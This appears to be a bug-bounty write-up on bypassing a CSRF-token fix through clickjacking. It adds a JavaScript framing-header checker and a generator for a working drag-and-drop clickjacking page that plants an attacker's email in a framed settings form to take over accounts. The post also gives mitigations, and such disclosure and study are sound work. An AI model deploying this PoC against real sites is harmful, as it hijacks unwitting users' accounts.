It's considered a low finding, tbh, but if you find a URL that has some critical actions like deleting or adding a user, or changing a user's email, then some companies, like Google, might consider it a medium/high finding.
Clickjackings in Google worth $14,981.70
Instead of going for Cross-Site Scripting, Remote Code Execution, SQL Injection, etc., I decided to find clickjacking in…
So I was looking for bugs on a website and reported a CSRF issue that led to account takeover. After a few weeks they fixed it by adding a CSRF token/key to the request, like so.
I tried bypassing it in various ways but had no luck, until I discovered that the page was vulnerable to clickjacking. I use a website that tells me whether a URL can be clickjacked or not.
Because the page can be framed, the CSRF token stops being an obstacle: the victim's own browser submits the legitimate form, token included, from inside an invisible iframe, and the attacker only has to steer the victim's clicks and drags onto the right controls. The page lets the user change their name and email, and it looked like this.
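To make the framing check concrete, here is the logic a "can this URL be clickjacked" checker has to implement, written as an added example for this page (it is not the author's tool and not code from the original post). It applies the rules browsers use: an enforced Content-Security-Policy with a frame-ancestors directive decides on its own and X-Frame-Options is then ignored; otherwise DENY blocks all framing, SAMEORIGIN allows only same-origin ancestors, conflicting values fail closed, no header at all lets anyone frame the page, and a Report-Only policy enforces nothing. The target URL, origins and header sets below are constructed samples.

```javascript
'use strict';

// Added example, not code from the post or from any particular online checker: decides
// whether a response can be rendered inside frames owned by the given ancestor origins,
// following the X-Frame-Options and CSP frame-ancestors rules browsers apply.

const DEFAULT_PORT = { 'http:': '80', 'https:': '443' };

// Collect the values of one header, case-insensitively; a value may be a string or an array.
function headerValues(headers, name) {
  return Object.keys(headers)
    .filter(k => k.toLowerCase() === name)
    .flatMap(k => [].concat(headers[k]));
}

// Does one frame-ancestors source expression match an ancestor origin?
function sourceMatches(source, ancestorOrigin, pageOrigin) {
  const s = source.toLowerCase();
  if (s === "'none'") return false;
  if (s === "'self'") return ancestorOrigin === pageOrigin;
  if (s === '*') return true;
  const a = new URL(ancestorOrigin);
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return a.protocol === s;      // scheme-source, e.g. https:
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^:\/*]+)(?::(\*|\d+))?$/.exec(s);
  if (!m) return false;                                              // malformed source: allow nothing
  const [, scheme, wildcard, host, port] = m;
  if (scheme) {
    if (a.protocol !== scheme + ':') return false;
  } else if (a.protocol !== new URL(pageOrigin).protocol && a.protocol !== 'https:') {
    return false;                            // no scheme given: page's scheme, or its secure upgrade
  }
  if (wildcard ? !a.hostname.endsWith('.' + host) : a.hostname !== host) return false;
  if (port === '*') return true;
  // No explicit port means the default port of the scheme; URL() reports default ports as ''.
  const ancestorPort = a.port || DEFAULT_PORT[a.protocol] || '';
  const wantPort = port || DEFAULT_PORT[scheme ? scheme + ':' : a.protocol] || '';
  return ancestorPort === wantPort;
}

function canBeFramed(responseUrl, headers, ancestorOrigins) {
  const pageOrigin = new URL(responseUrl).origin;

  // 1. If any enforced CSP carries frame-ancestors, it alone decides and X-Frame-Options
  //    is ignored. Content-Security-Policy-Report-Only never blocks anything.
  const frameAncestorLists = [];
  for (const policy of headerValues(headers, 'content-security-policy')) {
    for (const directive of policy.split(';')) {
      const tokens = directive.trim().split(/\s+/);
      if (tokens[0].toLowerCase() === 'frame-ancestors') frameAncestorLists.push(tokens.slice(1));
    }
  }
  if (frameAncestorLists.length > 0) {
    // Every ancestor must be allowed by every policy; an empty source list allows nothing.
    return ancestorOrigins.every(anc =>
      frameAncestorLists.every(list => list.some(src => sourceMatches(src, anc, pageOrigin))));
  }

  // 2. X-Frame-Options.
  const values = [...new Set(
    headerValues(headers, 'x-frame-options')
      .flatMap(v => v.split(','))
      .map(v => v.trim().toLowerCase())
      .filter(Boolean))];
  if (values.length === 0) return true;                  // no header at all: anyone may frame it
  if (values.length > 1) {
    // Conflicting values: browsers fail closed if any recognised keyword is among them.
    return !values.some(v => v === 'deny' || v === 'sameorigin' || v === 'allowall');
  }
  if (values[0] === 'deny') return false;
  if (values[0] === 'sameorigin') return ancestorOrigins.every(anc => anc === pageOrigin);
  return true;  // unrecognised value, including the obsolete ALLOW-FROM: current browsers ignore it
}

// Constructed sample responses for a hypothetical settings page.
const PAGE = 'https://target.example/account/settings';
const ATTACKER = ['https://attacker.example'];
const SAMPLE_HEADERS = {
  unprotected:    {},
  deny:           { 'X-Frame-Options': 'DENY' },
  sameorigin:     { 'X-Frame-Options': 'SAMEORIGIN' },
  conflicting:    { 'X-Frame-Options': 'SAMEORIGIN, ALLOWALL' },
  cspNone:        { 'Content-Security-Policy': "default-src 'self'; frame-ancestors 'none'" },
  cspPartner:     { 'Content-Security-Policy': "frame-ancestors 'self' https://*.partner.example" },
  cspWinsOverXfo: { 'X-Frame-Options': 'DENY', 'Content-Security-Policy': 'frame-ancestors *' },
  reportOnly:     { 'Content-Security-Policy-Report-Only': "frame-ancestors 'none'" },
};

// True when the attacker (or the given ancestors) can frame the sample page.
function clickjackable(name, ancestors = ATTACKER) {
  return canBeFramed(PAGE, SAMPLE_HEADERS[name], ancestors);
}
```

The fix for a page like the one in this write-up is `Content-Security-Policy: frame-ancestors 'none'` (with `X-Frame-Options: DENY` for older browsers); a CSRF token alone does not help, because the request the victim is tricked into sending is the legitimate one. A session cookie marked SameSite=Lax or Strict also blunts the attack, since the framed page then loads without the victim's session.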
To exploit this I created a page in which the user has to drag something to a box and then click a button. What was really happening in the background was that the user was dragging text into the Email box and then clicking Save Changes, which led to account takeover.
The HTML can be found here: https://pastebin.com/av71Mmf9. You can position the finish button and the red blob as required, and also change the “DRAG ME TO THE RED BOX” text.
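For reference, a drag-and-drop clickjacking page of the kind described above, as an added example that is not the pastebin PoC linked here: a near-transparent iframe of the target settings page sits on top of decoy elements, so drops and clicks land in the real page; the visible "DRAG ME" text is the bait, but its dragstart handler swaps the dragged payload for the attacker's email, which lands in the framed Email input positioned under the "red box"; and the decoy "Finish" button sits under the framed Save Changes button. The target URL, the coordinates of the framed controls and the attacker's address are assumptions; the generator writes the page as a string so the positions can be tuned from the command line.

```javascript
'use strict';

// Added example, not the PoC from the post's pastebin link: builds a drag-and-drop
// clickjacking page. The target URL, the coordinates of the framed Email field and
// Save Changes button, and the attacker's address are all assumptions to be adjusted.

function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, c => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Serialise a value as a JS string literal that is safe inside an inline <script>.
function jsString(s) {
  return JSON.stringify(String(s)).replace(/</g, '\\u003c');
}

// CSS for an absolutely positioned rectangle {x, y, w, h} in page pixels.
function box(rect, extra) {
  return `position:absolute;left:${rect.x}px;top:${rect.y}px;width:${rect.w}px;height:${rect.h}px;${extra}`;
}

function buildDragAndDropPoc(opts) {
  const {
    targetUrl,                 // settings page that lacks X-Frame-Options / frame-ancestors
    attackerEmail,             // value that actually gets dropped into the Email input
    emailBox,                  // {x,y,w,h}: where the framed Email input renders
    saveButton,                // {x,y,w,h}: where the framed "Save Changes" button renders
    frameSize = { w: 1200, h: 900 },
    frameOpacity = 0.0001,     // ~invisible; use ~0.5 while aligning the decoys
    baitText = 'DRAG ME TO THE RED BOX',
  } = opts;

  return `<!doctype html>
<html>
<head>
<meta charset="utf-8">
<title>Quick game</title>
<style>
  body { margin:0; font-family:sans-serif; }
  /* The real page, on top of everything: drops and clicks land in it, not on the decoys. */
  #target { position:absolute; left:0; top:0; width:${frameSize.w}px; height:${frameSize.h}px;
            border:0; opacity:${frameOpacity}; z-index:2; }
  /* Decoys sit under the transparent frame, exactly where the real controls are. */
  #redbox { ${box(emailBox, 'background:#d22; z-index:1;')} }
  #finish { ${box(saveButton, 'background:#2a2; color:#fff; text-align:center; z-index:1;')} }
  /* The bait is above the frame so the victim can grab it, away from any real control. */
  #bait   { position:absolute; left:40px; top:40px; padding:12px; background:#ffd; cursor:grab; z-index:3; }
</style>
</head>
<body>
<div id="bait" draggable="true">${escapeHtml(baitText)}</div>
<div id="redbox"></div>
<div id="finish">Finish</div>
<iframe id="target" src="${escapeHtml(targetUrl)}"></iframe>
<script>
  document.getElementById('bait').addEventListener('dragstart', function (e) {
    // The victim sees the bait text, but the payload dropped into the framed
    // Email input is the attacker's address.
    e.dataTransfer.setData('text/plain', ${jsString(attackerEmail)});
  });
</script>
</body>
</html>`;
}

// Constructed sample configuration for the hypothetical target.
const SAMPLE_POC = buildDragAndDropPoc({
  targetUrl: 'https://target.example/account/settings',
  attackerEmail: 'attacker@evil.example',
  emailBox: { x: 420, y: 310, w: 260, h: 32 },
  saveButton: { x: 420, y: 420, w: 140, h: 36 },
});
```

Write `SAMPLE_POC` to a file and open it in a browser to align the decoys, starting with `frameOpacity` around 0.5 and lowering it once the red box and Finish button cover the real Email field and Save Changes button. Whether a browser lets text dropped from the top-level page reach an input inside a cross-origin iframe differs between browsers and versions, so a drag-and-drop PoC has to be verified in the browsers the target actually supports, and the first thing to confirm is that the page really is served without X-Frame-Options or a CSP frame-ancestors directive.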
I thought this was enough for a PoC, and the impact was also high, so I sent the report and it got accepted. They fixed it and rewarded me pretty quickly.
Hope you learned something.